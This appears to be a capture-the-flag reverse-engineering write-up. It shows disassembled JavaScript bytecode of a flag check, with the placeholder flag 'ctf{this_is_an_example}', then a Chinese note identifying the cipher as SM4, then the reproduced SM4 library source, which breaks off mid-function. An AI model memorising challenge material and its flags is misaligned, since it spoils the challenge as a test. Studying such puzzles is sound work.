313 : CBC_PUSH_NUMBER_POS_BYTE number:157
315 : CBC_PUSH_NUMBER_POS_BYTE number:53
317 : CBC_NEW byte_arg:16
319 : CBC_ASSIGN_BLOCK
320 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:6
323 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:30
326 : CBC_PUSH_NUMBER_POS_BYTE number:36
328 : CBC_PUSH_NUMBER_POS_BYTE number:14
330 : CBC_PUSH_NUMBER_POS_BYTE number:94
332 : CBC_PUSH_NUMBER_POS_BYTE number:99
334 : CBC_PUSH_NUMBER_POS_BYTE number:88
336 : CBC_PUSH_NUMBER_POS_BYTE number:209
338 : CBC_PUSH_NUMBER_POS_BYTE number:162
340 : CBC_PUSH_NUMBER_POS_BYTE number:37
342 : CBC_PUSH_NUMBER_POS_BYTE number:34
344 : CBC_PUSH_NUMBER_POS_BYTE number:124
346 : CBC_PUSH_NUMBER_POS_BYTE number:59
348 : CBC_PUSH_NUMBER_POS_BYTE number:1
350 : CBC_PUSH_NUMBER_POS_BYTE number:33
352 : CBC_PUSH_NUMBER_POS_BYTE number:120
354 : CBC_PUSH_NUMBER_POS_BYTE number:135
356 : CBC_NEW byte_arg:16
358 : CBC_ASSIGN_BLOCK
359 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:7
362 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:212
365 : CBC_PUSH_NUMBER_0
366 : CBC_PUSH_NUMBER_POS_BYTE number:70
368 : CBC_PUSH_NUMBER_POS_BYTE number:87
370 : CBC_PUSH_NUMBER_POS_BYTE number:159
372 : CBC_PUSH_NUMBER_POS_BYTE number:211
374 : CBC_PUSH_NUMBER_POS_BYTE number:39
376 : CBC_PUSH_NUMBER_POS_BYTE number:82
378 : CBC_PUSH_NUMBER_POS_BYTE number:76
380 : CBC_PUSH_NUMBER_POS_BYTE number:54
382 : CBC_PUSH_NUMBER_POS_BYTE number:2
384 : CBC_PUSH_NUMBER_POS_BYTE number:231
386 : CBC_PUSH_NUMBER_POS_BYTE number:160
388 : CBC_PUSH_NUMBER_POS_BYTE number:196
390 : CBC_PUSH_NUMBER_POS_BYTE number:200
392 : CBC_PUSH_NUMBER_POS_BYTE number:158
394 : CBC_NEW byte_arg:16
396 : CBC_ASSIGN_BLOCK
397 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:8
400 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:234
403 : CBC_PUSH_NUMBER_POS_BYTE number:191
405 : CBC_PUSH_NUMBER_POS_BYTE number:138
407 : CBC_PUSH_NUMBER_POS_BYTE number:210
409 : CBC_PUSH_NUMBER_POS_BYTE number:64
411 : CBC_PUSH_NUMBER_POS_BYTE number:199
413 : CBC_PUSH_NUMBER_POS_BYTE number:56
415 : CBC_PUSH_NUMBER_POS_BYTE number:181
417 : CBC_PUSH_NUMBER_POS_BYTE number:163
419 : CBC_PUSH_NUMBER_POS_BYTE number:247
421 : CBC_PUSH_NUMBER_POS_BYTE number:242
423 : CBC_PUSH_NUMBER_POS_BYTE number:206
425 : CBC_PUSH_NUMBER_POS_BYTE number:249
427 : CBC_PUSH_NUMBER_POS_BYTE number:97
429 : CBC_PUSH_NUMBER_POS_BYTE number:21
431 : CBC_PUSH_NUMBER_POS_BYTE number:161
433 : CBC_NEW byte_arg:16
435 : CBC_ASSIGN_BLOCK
436 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:9
439 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:224
442 : CBC_PUSH_NUMBER_POS_BYTE number:174
444 : CBC_PUSH_NUMBER_POS_BYTE number:93
446 : CBC_PUSH_NUMBER_POS_BYTE number:164
448 : CBC_PUSH_NUMBER_POS_BYTE number:155
450 : CBC_PUSH_NUMBER_POS_BYTE number:52
452 : CBC_PUSH_NUMBER_POS_BYTE number:26
454 : CBC_PUSH_NUMBER_POS_BYTE number:85
456 : CBC_PUSH_NUMBER_POS_BYTE number:173
458 : CBC_PUSH_NUMBER_POS_BYTE number:147
460 : CBC_PUSH_NUMBER_POS_BYTE number:50
462 : CBC_PUSH_NUMBER_POS_BYTE number:48
464 : CBC_PUSH_NUMBER_POS_BYTE number:245
466 : CBC_PUSH_NUMBER_POS_BYTE number:140
468 : CBC_PUSH_NUMBER_POS_BYTE number:177
470 : CBC_PUSH_NUMBER_POS_BYTE number:227
472 : CBC_NEW byte_arg:16
474 : CBC_ASSIGN_BLOCK
475 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:10
478 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:29
481 : CBC_PUSH_NUMBER_POS_BYTE number:246
483 : CBC_PUSH_NUMBER_POS_BYTE number:226
485 : CBC_PUSH_NUMBER_POS_BYTE number:46
487 : CBC_PUSH_NUMBER_POS_BYTE number:130
489 : CBC_PUSH_NUMBER_POS_BYTE number:102
491 : CBC_PUSH_NUMBER_POS_BYTE number:202
493 : CBC_PUSH_NUMBER_POS_BYTE number:96
495 : CBC_PUSH_NUMBER_POS_BYTE number:192
497 : CBC_PUSH_NUMBER_POS_BYTE number:41
499 : CBC_PUSH_NUMBER_POS_BYTE number:35
501 : CBC_PUSH_NUMBER_POS_BYTE number:171
503 : CBC_PUSH_NUMBER_POS_BYTE number:13
505 : CBC_PUSH_NUMBER_POS_BYTE number:83
507 : CBC_PUSH_NUMBER_POS_BYTE number:78
509 : CBC_PUSH_NUMBER_POS_BYTE number:111
511 : CBC_NEW byte_arg:16
513 : CBC_ASSIGN_BLOCK
514 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:11
517 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:213
520 : CBC_PUSH_NUMBER_POS_BYTE number:219
522 : CBC_PUSH_NUMBER_POS_BYTE number:55
524 : CBC_PUSH_NUMBER_POS_BYTE number:69
526 : CBC_PUSH_NUMBER_POS_BYTE number:222
528 : CBC_PUSH_NUMBER_POS_BYTE number:253
530 : CBC_PUSH_NUMBER_POS_BYTE number:142
532 : CBC_PUSH_NUMBER_POS_BYTE number:47
534 : CBC_PUSH_NUMBER_POS_BYTE number:3
536 : CBC_PUSH_NUMBER_POS_BYTE number:255
538 : CBC_PUSH_NUMBER_POS_BYTE number:106
540 : CBC_PUSH_NUMBER_POS_BYTE number:114
542 : CBC_PUSH_NUMBER_POS_BYTE number:109
544 : CBC_PUSH_NUMBER_POS_BYTE number:108
546 : CBC_PUSH_NUMBER_POS_BYTE number:91
548 : CBC_PUSH_NUMBER_POS_BYTE number:81
550 : CBC_NEW byte_arg:16
552 : CBC_ASSIGN_BLOCK
553 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:12
556 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:141
559 : CBC_PUSH_NUMBER_POS_BYTE number:27
561 : CBC_PUSH_NUMBER_POS_BYTE number:175
563 : CBC_PUSH_NUMBER_POS_BYTE number:146
565 : CBC_PUSH_NUMBER_POS_BYTE number:187
567 : CBC_PUSH_NUMBER_POS_BYTE number:221
569 : CBC_PUSH_NUMBER_POS_BYTE number:188
571 : CBC_PUSH_NUMBER_POS_BYTE number:127
573 : CBC_PUSH_NUMBER_POS_BYTE number:17
575 : CBC_PUSH_NUMBER_POS_BYTE number:217
577 : CBC_PUSH_NUMBER_POS_BYTE number:92
579 : CBC_PUSH_NUMBER_POS_BYTE number:65
581 : CBC_PUSH_NUMBER_POS_BYTE number:31
583 : CBC_PUSH_NUMBER_POS_BYTE number:16
585 : CBC_PUSH_NUMBER_POS_BYTE number:90
587 : CBC_PUSH_NUMBER_POS_BYTE number:216
589 : CBC_NEW byte_arg:16
591 : CBC_ASSIGN_BLOCK
592 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:13
595 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:10
598 : CBC_PUSH_NUMBER_POS_BYTE number:193
600 : CBC_PUSH_NUMBER_POS_BYTE number:49
602 : CBC_PUSH_NUMBER_POS_BYTE number:136
604 : CBC_PUSH_NUMBER_POS_BYTE number:165
606 : CBC_PUSH_NUMBER_POS_BYTE number:205
608 : CBC_PUSH_NUMBER_POS_BYTE number:123
610 : CBC_PUSH_NUMBER_POS_BYTE number:189
612 : CBC_PUSH_NUMBER_POS_BYTE number:45
614 : CBC_PUSH_NUMBER_POS_BYTE number:116
616 : CBC_PUSH_NUMBER_POS_BYTE number:208
618 : CBC_PUSH_NUMBER_POS_BYTE number:18
620 : CBC_PUSH_NUMBER_POS_BYTE number:184
622 : CBC_PUSH_NUMBER_POS_BYTE number:229
624 : CBC_PUSH_NUMBER_POS_BYTE number:180
626 : CBC_PUSH_NUMBER_POS_BYTE number:176
628 : CBC_NEW byte_arg:16
630 : CBC_ASSIGN_BLOCK
631 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:14
634 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:137
637 : CBC_PUSH_NUMBER_POS_BYTE number:105
639 : CBC_PUSH_NUMBER_POS_BYTE number:151
641 : CBC_PUSH_NUMBER_POS_BYTE number:74
643 : CBC_PUSH_NUMBER_POS_BYTE number:12
645 : CBC_PUSH_NUMBER_POS_BYTE number:150
647 : CBC_PUSH_NUMBER_POS_BYTE number:119
649 : CBC_PUSH_NUMBER_POS_BYTE number:126
651 : CBC_PUSH_NUMBER_POS_BYTE number:101
653 : CBC_PUSH_NUMBER_POS_BYTE number:185
655 : CBC_PUSH_NUMBER_POS_BYTE number:241
657 : CBC_PUSH_NUMBER_POS_BYTE number:9
659 : CBC_PUSH_NUMBER_POS_BYTE number:197
661 : CBC_PUSH_NUMBER_POS_BYTE number:110
663 : CBC_PUSH_NUMBER_POS_BYTE number:198
665 : CBC_PUSH_NUMBER_POS_BYTE number:132
667 : CBC_NEW byte_arg:16
669 : CBC_ASSIGN_BLOCK
670 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:15
673 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:24
676 : CBC_PUSH_NUMBER_POS_BYTE number:240
678 : CBC_PUSH_NUMBER_POS_BYTE number:125
680 : CBC_PUSH_NUMBER_POS_BYTE number:236
682 : CBC_PUSH_NUMBER_POS_BYTE number:58
684 : CBC_PUSH_NUMBER_POS_BYTE number:220
686 : CBC_PUSH_NUMBER_POS_BYTE number:77
688 : CBC_PUSH_NUMBER_POS_BYTE number:32
690 : CBC_PUSH_NUMBER_POS_BYTE number:121
692 : CBC_PUSH_NUMBER_POS_BYTE number:238
694 : CBC_PUSH_NUMBER_POS_BYTE number:95
696 : CBC_PUSH_NUMBER_POS_BYTE number:62
698 : CBC_PUSH_NUMBER_POS_BYTE number:215
700 : CBC_PUSH_NUMBER_POS_BYTE number:203
702 : CBC_PUSH_NUMBER_POS_BYTE number:57
704 : CBC_PUSH_NUMBER_POS_BYTE number:72
706 : CBC_NEW byte_arg:16
708 : CBC_ASSIGN_BLOCK
709 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:30->number(462357) const:31->number(472066609)
713 : CBC_PUSH_THREE_LITERALS const:32->number(943670861) const:33->number(1415275113) const:34->number(1886879365)
717 : CBC_PUSH_THREE_LITERALS const:35->number(2358483617) const:36->number(2830087869) const:37->number(3301692121)
721 : CBC_PUSH_THREE_LITERALS const:38->number(3773296373) const:39->number(4228057617) const:40->number(404694573)
725 : CBC_PUSH_THREE_LITERALS const:41->number(876298825) const:42->number(1347903077) const:43->number(1819507329)
729 : CBC_PUSH_THREE_LITERALS const:44->number(2291111581) const:45->number(2762715833) const:46->number(3234320085)
733 : CBC_PUSH_THREE_LITERALS const:47->number(3705924337) const:48->number(4177462797) const:49->number(337322537)
737 : CBC_PUSH_THREE_LITERALS const:50->number(808926789) const:51->number(1280531041) const:52->number(1752135293)
741 : CBC_PUSH_THREE_LITERALS const:53->number(2223739545) const:54->number(2695343797) const:55->number(3166948049)
745 : CBC_PUSH_THREE_LITERALS const:56->number(3638552301) const:57->number(4110090761) const:58->number(269950501)
749 : CBC_PUSH_THREE_LITERALS const:59->number(741554753) const:60->number(1213159005) const:61->number(1684763257)
753 : CBC_NEW byte_arg:32
755 : CBC_ASSIGN_SET_IDENT ident:6->string(CK)
757 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:62->number(2746333894) const:63->number(1453994832)
761 : CBC_PUSH_TWO_LITERALS const:64->number(1736282519) const:65->number(2993693404)
764 : CBC_NEW byte_arg:4
766 : CBC_ASSIGN_SET_IDENT ident:7->string(FK)
768 : CBC_PUSH_LITERAL const:66->string(ctf{this_is_an_example})
770 : CBC_ASSIGN_SET_IDENT ident:18->string(input)
772 : CBC_PUSH_NUMBER_0
773 : CBC_ASSIGN_SET_IDENT ident:19->string(num)
775 : CBC_PUSH_LITERAL ident:23->string(Array)
777 : CBC_NEW0
778 : CBC_ASSIGN_SET_IDENT ident:20->string(message)
780 : CBC_PUSH_NUMBER_0
781 : CBC_MOV_IDENT reg:1
783 : CBC_JUMP_FORWARD offset:32(->815)
785 : CBC_MULTIPLY_TWO_LITERALS ident:19->string(num) const:67->number(256)
788 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:18->string(input) const:68->string(charCodeAt)
791 : CBC_PUSH_LITERAL reg:1
793 : CBC_CALL1_PROP_PUSH_RESULT
794 : CBC_ADD
795 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
797 : CBC_MODULO_TWO_LITERALS reg:1 const:69->number(4)
800 : CBC_EQUAL_RIGHT_LITERAL const:70->number(3)
802 : CBC_BRANCH_IF_FALSE_FORWARD offset:11(->813)
804 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
807 : CBC_PUSH_LITERAL ident:19->string(num)
809 : CBC_CALL1_PROP_BLOCK
810 : CBC_PUSH_NUMBER_0
811 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
813 : CBC_PRE_INCR_IDENT reg:1
815 : CBC_PUSH_TWO_LITERALS reg:1 ident:18->string(input)
818 : CBC_PUSH_PROP_LITERAL const:72->string(length)
820 : CBC_LESS
821 : CBC_BRANCH_IF_TRUE_BACKWARD offset:36(->785)
823 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:24->string(Math) const:73->string(ceil)
826 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
829 : CBC_DIVIDE_RIGHT_LITERAL const:69->number(4)
831 : CBC_CALL1_PROP_PUSH_RESULT
832 : CBC_ASSIGN_SET_IDENT ident:21->string(count)
834 : CBC_MULTIPLY_TWO_LITERALS ident:21->string(count) const:69->number(4)
837 : CBC_ASSIGN_SET_IDENT ident:22->string(pad_len)
839 : CBC_JUMP_FORWARD offset:7(->846)
841 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
844 : CBC_PUSH_NUMBER_0
845 : CBC_CALL1_PROP_BLOCK
846 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
849 : CBC_LESS_RIGHT_LITERAL ident:22->string(pad_len)
851 : CBC_BRANCH_IF_TRUE_BACKWARD offset:10(->841)
853 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:74->number(19088743) const:75->number(2309737967)
857 : CBC_PUSH_TWO_LITERALS const:76->number(4275878552) const:77->number(1985229328)
860 : CBC_NEW byte_arg:4
862 : CBC_ASSIGN_SET_IDENT_BLOCK ident:25->string(key)
864 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:78->number(1605062385) const:79->number(-642825121)
868 : CBC_PUSH_THREE_LITERALS const:80->number(2061445208) const:81->number(1405610911) const:82->number(1713399267)
872 : CBC_PUSH_THREE_LITERALS const:83->number(1396669315) const:84->number(1081797168) const:85->number(605181189)
876 : CBC_PUSH_THREE_LITERALS const:86->number(1824766525) const:87->number(1196148725) const:88->number(763423307)
880 : CBC_PUSH_LITERAL const:89->number(1125925868)
882 : CBC_NEW byte_arg:12
884 : CBC_ASSIGN_SET_IDENT_BLOCK ident:26->string(ans)
886 : CBC_PUSH_LITERAL ident:23->string(Array)
888 : CBC_NEW0
889 : CBC_ASSIGN_SET_IDENT_BLOCK ident:27->string(message_c)
891 : CBC_PUSH_NUMBER_0
892 : CBC_MOV_IDENT reg:1
894 : CBC_JUMP_FORWARD offset:47(->941)
896 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:90->string(splice)
899 : CBC_PUSH_NUMBER_0
900 : CBC_PUSH_NUMBER_POS_BYTE number:4
902 : CBC_CALL2_PROP_PUSH_RESULT
903 : CBC_MOV_IDENT reg:2
905 : CBC_PUSH_THREE_LITERALS ident:15->string(encrypt) reg:2 ident:25->string(key)
909 : CBC_CALL2_PUSH_RESULT
910 : CBC_MOV_IDENT reg:3
912 : CBC_PUSH_NUMBER_0
913 : CBC_MOV_IDENT reg:4
915 : CBC_JUMP_FORWARD offset:16(->931)
917 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:27->string(message_c) const:71->string(push)
920 : CBC_PUSH_THREE_LITERALS ident:28->string(parseInt) reg:3 reg:4
924 : CBC_PUSH_PROP
925 : CBC_PUSH_NUMBER_POS_BYTE number:16
927 : CBC_CALL2_PUSH_RESULT
928 : CBC_CALL1_PROP_BLOCK
929 : CBC_PRE_INCR_IDENT reg:4
931 : CBC_PUSH_TWO_LITERALS reg:4 reg:3
934 : CBC_PUSH_PROP_LITERAL const:72->string(length)
936 : CBC_LESS
937 : CBC_BRANCH_IF_TRUE_BACKWARD offset:20(->917)
939 : CBC_PRE_INCR_IDENT reg:1
941 : CBC_LESS_TWO_LITERALS reg:1 ident:21->string(count)
944 : CBC_BRANCH_IF_TRUE_BACKWARD offset:48(->896)
946 : CBC_PUSH_LITERAL ident:27->string(message_c)
948 : CBC_BRANCH_IF_FALSE_FORWARD offset:10(->958)
950 : CBC_PUSH_THREE_LITERALS ident:29->string(print) ident:17->string(compare_array) ident:27->string(message_c)
954 : CBC_PUSH_LITERAL ident:26->string(ans)
956 : CBC_CALL2_PUSH_RESULT
957 : CBC_CALL1_BLOCK
958 : CBC_RETURN_FUNCTION_END
false
一开始用记事本打开 snapshot 的时候看到了 sm4 等关键词，猜测加密算法为 sm4；符号没去掉，找到了源码
/*! sm4-1.0.js (c) Windard Yang | <https://www.windard.com/>
*/
/*
* sm4-1.0.js
*
* Copyright (c) 2014 Windard Yang (www.windard.com)
*/
/**
* @fileOverview
* @name sm4-1.0.js
* @author Windard (www.windard.com)
* @version 1.0.0 (2016-11-17)
*/
/* this is sm4 in javascript by windard , today is 2016 11-17 ,
*I'm afraid that can I finished this project , but after all
*in December, everything will be done , that's prefect
*/
/*
* garbage , rubbish programe language, should havn't big decimal number
* can't circular bitwise left shift, can do xor well
*/
/*
* fuck it at all , finally finished it , and there has many other works need to do
*
*/
// SM4 S-box laid out as a 16x16 table: sm4Sbox() below indexes it by the high
// nibble and then the low nibble of each byte of the 32-bit input word.
var SboxTable = new Array();
SboxTable[0] = new Array(0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05);
SboxTable[1] = new Array(0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99);
SboxTable[2] = new Array(0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62);
SboxTable[3] = new Array(0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6);
SboxTable[4] = new Array(0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8);
SboxTable[5] = new Array(0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35);
SboxTable[6] = new Array(0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87);
SboxTable[7] = new Array(0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e);
SboxTable[8] = new Array(0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1);
SboxTable[9] = new Array(0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3);
SboxTable[10] = new Array(0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f);
SboxTable[11] = new Array(0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51);
SboxTable[12] = new Array(0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8);
SboxTable[13] = new Array(0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0);
SboxTable[14] = new Array(0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84);
SboxTable[15] = new Array(0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48);
// Key-schedule round constants CK[0..31]; sm4_getkey() consumes one per round.
var CK = new Array(
0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
);
// System parameters FK: XORed into the four master-key words before key expansion.
var FK = new Array(0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc);
// function bigxor(a, b) {
// if (a.toString(2).length < 33 && b.toString(2).length < 33){
// return a ^ b
// }
// var abin = a.toString(2);
// var bbin = b.toString(2);
// var loggest = abin.length >= bbin.length ? abin.length : bbin.length;
// abin = abin.length == loggest ? abin :"0".repeat(loggest - abin.length) + abin;
// bbin = bbin.length == loggest ? bbin :"0".repeat(loggest - bbin.length) + bbin;
// var result = "";
// for (var i = loggest - 1; i >= 0; i--) {
// result = abin[i] == bbin[i] ? '0'+result : '1'+result;
// };
// return parseInt(result, 2);
// }
function bigxor(a, b) {
    // Plain 32-bit XOR. The operator truncates both operands to int32, so the
    // big-number variant kept in the comment above is not needed for SM4 words.
    var result = a ^ b
    return result
}
// function leftshift(a, n, size=32) {
// var result = new Array(size);
// result.fill(0);
// var bin = a.toString(2);
// bin = bin.length == size ? bin :"0".repeat(size - bin.length) + bin;
// for (var i = bin.length - 1; i >= 0; i--) {
// result[(i - n + size)%size] = bin[i];
// };
// result = result.join("");
// return parseInt(result, 2);
// }
function leftshift(a, n, size = 32) {
    // Rotate the low `size` bits of `a` left by `n` (n is reduced modulo size).
    // The result is a signed int32 because `<<` and `|` operate on int32 values.
    var shift = n % size
    var high = a << shift
    var low = a >>> (size - shift)
    return high | low
}
function prefixInteger(str, length) {
    // Left-pad `str` with zeros to exactly `length` characters. A longer input
    // keeps only its last `length` characters; length 0 returns it unchanged.
    var zeros = Array(length + 1).join("0")
    var padded = zeros + String(str)
    return padded.slice(-length)
}
// function sm4Sbox(a) {
// var a1 = prefixInteger(a.toString(16),8).slice(0,2);
// var a2 = prefixInteger(a.toString(16),8).slice(2,4);
// var a3 = prefixInteger(a.toString(16),8).slice(4,6);
// var a4 = prefixInteger(a.toString(16),8).slice(6,8);
// var b1 = SboxTable[parseInt(a1[0], 16)][parseInt(a1[1], 16)];
// var b2 = SboxTable[parseInt(a2[0], 16)][parseInt(a2[1], 16)];
// var b3 = SboxTable[parseInt(a3[0], 16)][parseInt(a3[1], 16)];
// var b4 = SboxTable[parseInt(a4[0], 16)][parseInt(a4[1], 16)];
// return parseInt(prefixInteger(b1.toString(16), 2) + prefixInteger(b2.toString(16), 2) + prefixInteger(b3.toString(16), 2) + prefixInteger(b4.toString(16), 2) , 16)
// }
function sm4Sbox(a) {
    // Byte-wise S-box substitution of a 32-bit word: each byte is replaced by
    // SboxTable[high nibble][low nibble] and put back in its position.
    // Returns a signed int32 (the top byte may set the sign bit).
    var out = 0
    for (var shift = 24; shift >= 0; shift -= 8) {
        var byte = (a >>> shift) & 0xff
        var substituted = SboxTable[byte >>> 4][byte & 0x0f]
        out = out | (substituted << shift)
    }
    return out
}
function GET_ULONG_BE(a) {
    // Round-function transform T: S-box substitution followed by the linear mix
    // B ^ (B<<<2) ^ (B<<<10) ^ (B<<<18) ^ (B<<<24). Despite its name this is
    // not a byte-order helper.
    var b = sm4Sbox(a)
    var rotations = [2, 10, 18, 24]
    var acc = b
    for (var i = 0; i < rotations.length; i++) {
        acc = bigxor(acc, leftshift(b, rotations[i]))
    }
    return acc
}
function PUT_ULONG_BE(b) {
    // Key-schedule transform T': S-box substitution followed by
    // B ^ (B<<<13) ^ (B<<<23). Used only by sm4_getkey().
    var s = sm4Sbox(b)
    var r13 = leftshift(s, 13)
    var r23 = leftshift(s, 23)
    return bigxor(bigxor(s, r13), r23)
}
function sm4_getkey(MK) {
    // SM4 key expansion: whiten the four master-key words with FK, then derive
    // 32 round keys as K[i+4] = K[i] ^ T'(K[i+1] ^ K[i+2] ^ K[i+3] ^ CK[i]).
    // Round keys are returned as hex strings (a negative int32 yields a leading
    // "-"), which the encrypt/decrypt functions read back with parseInt(.., 16).
    var K = new Array()
    var rk = new Array()
    for (var j = 0; j < 4; j++) {
        K[j] = bigxor(MK[j], FK[j])
    }
    for (var i = 0; i < 32; i++) {
        var mixed = bigxor(bigxor(K[i + 1], K[i + 2]), bigxor(K[i + 3], CK[i]))
        K[i + 4] = bigxor(K[i], PUT_ULONG_BE(mixed))
        rk[i] = K[i + 4].toString(16)
    }
    return rk
}
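function KJUR_encrypt_sm4(messsage, key, method = "cbc") {
    // Encrypt ONE 128-bit block given as four 32-bit words (messsage[0..3])
    // under the four-word key. `method` is accepted for signature compatibility
    // only: there is no chaining here, every call is an independent block operation.
    // Returns the output words in reverse order (X35, X34, X33, X32) as hex strings;
    // the words are signed int32, so one with the top bit set prints with a "-".
    var MK = key;
    // Work on a copy: the original wrote X[4..35] straight into the caller's array.
    // Only X[0..3] are ever read before being overwritten, so copying four words
    // leaves the result unchanged while keeping the input intact.
    var X = Array.prototype.slice.call(messsage, 0, 4);
    var rk = sm4_getkey(MK);
    for (var i = 0; i < 32; i++) {
        // Round function: X[i+4] = X[i] ^ T(X[i+1] ^ X[i+2] ^ X[i+3] ^ rk[i]),
        // where GET_ULONG_BE is T (S-box followed by the linear transform).
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
    }
    var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
    return Y;
}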
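function KJUR_decrypt_sm4(ciphertext, key, method = "cbc") {
    // Decrypt ONE 128-bit block (four 32-bit words, ciphertext[0..3]) under the
    // four-word key. SM4 decryption is the encryption round structure with the
    // round keys applied in reverse order. `method` is unused (no chaining).
    // Returns (X35, X34, X33, X32) as hex strings; signed words print with a "-".
    var MK = key;
    // Copy the input instead of extending the caller's array with the round
    // states; only X[0..3] are read before being overwritten.
    var X = Array.prototype.slice.call(ciphertext, 0, 4);
    var frk = sm4_getkey(MK);
    // Reversed round-key schedule (rk[i] = frk[31 - i]).
    var rk = frk.slice().reverse()
    for (var i = 0; i < 32; i++) {
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
    }
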